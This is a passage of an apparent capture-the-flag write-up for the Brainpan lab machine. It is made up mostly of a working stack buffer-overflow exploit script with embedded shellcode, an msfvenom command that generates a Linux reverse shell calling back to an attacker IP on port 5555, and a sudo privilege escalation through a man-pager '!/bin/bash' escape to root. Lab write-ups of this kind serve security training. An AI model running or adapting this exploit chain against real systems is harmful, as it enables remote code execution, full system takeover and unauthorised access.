b"\x39\xdf\x57\x2b\xa5\x72\x3c\xab\xa0\x6e\xeb\xfc\xe5\x41"
b"\xe2\x68\x18\xfb\x5c\x8e\xe1\x9d\xa7\x0a\x3e\x5e\x29\x93"
b"\xb3\xda\x0d\x83\x0d\xe2\x09\xf7\xc1\xb5\xc7\xa1\xa7\x6f"
b"\xa6\x1b\x7e\xc3\x60\xcb\x07\x2f\xb3\x8d\x07\x7a\x45\x71"
b"\xb9\xd3\x10\x8e\x76\xb4\x94\xf7\x6a\x24\x5a\x22\x2f\x54"
b"\x11\x6e\x06\xfd\xfc\xfb\x1a\x60\xff\xd6\x59\x9d\x7c\xd2"
b"\x21\x5a\x9c\x97\x24\x26\x1a\x44\x55\x37\xcf\x6a\xca\x38"
b"\xda")
print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.220.161',9999))
s.send(payload)
s.close()
Set up a listener for catching reverse shell on port 7777
We gained a shell but it is a hybrid environment where we couldn’t get a full access to linux
Terminate and Restart machine
Generate a Linux payload
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.8.252.53 LPORT=5555 -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf[] =
"\xb8\x82\x74\xa2\x14\xda\xc1\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x12\x31\x42\x12\x83\xea\xfc\x03\xc0\x7a\x40\xe1\xf5"
"\x59\x73\xe9\xa6\x1e\x2f\x84\x4a\x28\x2e\xe8\x2c\xe7\x31"
"\x9a\xe9\x47\x0e\x50\x89\xe1\x08\x93\xe1\xfb\xe2\x9f\xc4"
"\x93\xf0\x5f\x33\xd7\x7c\xbe\x8b\x71\x2f\x10\xb8\xce\xcc"
"\x1b\xdf\xfc\x53\x49\x77\x91\x7c\x1d\xef\x05\xac\xce\x8d"
"\xbc\x3b\xf3\x03\x6c\xb5\x15\x13\x99\x08\x55";
Edit exploit.py
import sys, socket
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32
payload2 = (b"\xb8\x82\x74\xa2\x14\xda\xc1\xd9\x74\x24\xf4\x5a\x29\xc9"
b"\xb1\x12\x31\x42\x12\x83\xea\xfc\x03\xc0\x7a\x40\xe1\xf5"
b"\x59\x73\xe9\xa6\x1e\x2f\x84\x4a\x28\x2e\xe8\x2c\xe7\x31"
b"\x9a\xe9\x47\x0e\x50\x89\xe1\x08\x93\xe1\xfb\xe2\x9f\xc4"
b"\x93\xf0\x5f\x33\xd7\x7c\xbe\x8b\x71\x2f\x10\xb8\xce\xcc"
b"\x1b\xdf\xfc\x53\x49\x77\x91\x7c\x1d\xef\x05\xac\xce\x8d"
b"\xbc\x3b\xf3\x03\x6c\xb5\x15\x13\x99\x08\x55";
print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.x.x',9999))
s.send(payload)
s.close()
Set up a listener on port 5555
Spawn TTY shell
Escalating Privileges
After spawning a TTY Shell
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
- network
- proclist
- manual [command]
puck@brainpan:/home/puck$ /home/anansi/bin/anansi_util network
/home/anansi/bin/anansi_util network
bash: /home/anansi/bin/anansi_util: Permission denied
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util network
sudo /home/anansi/bin/anansi_util network
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP qlen 1000
link/ether 02:46:b1:a1:5f:0b brd ff:ff:ff:ff:ff:ff
inet 10.10.80.44/16 brd 10.10.255.255 scope global eth0
inet6 fe80::46:b1ff:fea1:5f0b/64 scope link
valid_lft forever preferred_lft forever
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util proclist
sudo /home/anansi/bin/anansi_util proclist
'unknown': unknown terminal type.
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual
sudo /home/anansi/bin/anansi_util manual
No manual entry for manual
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual ls
sudo /home/anansi/bin/anansi_util manual ls
No manual entry for manual
WARNING: terminal is not fully functional
- (press RETURN)!/bin/bash
!/bin/bash
root@brainpan:/usr/share/man# id
id
uid=0(root) gid=0(root) groups=0(root)
root@brainpan:/usr/share/man#
We can write commands
shell escape sequences
vim
Upgrading the shell
AFter TTY shell
ctrl z
stty raw -echo
fg
fg
It should go back to the shell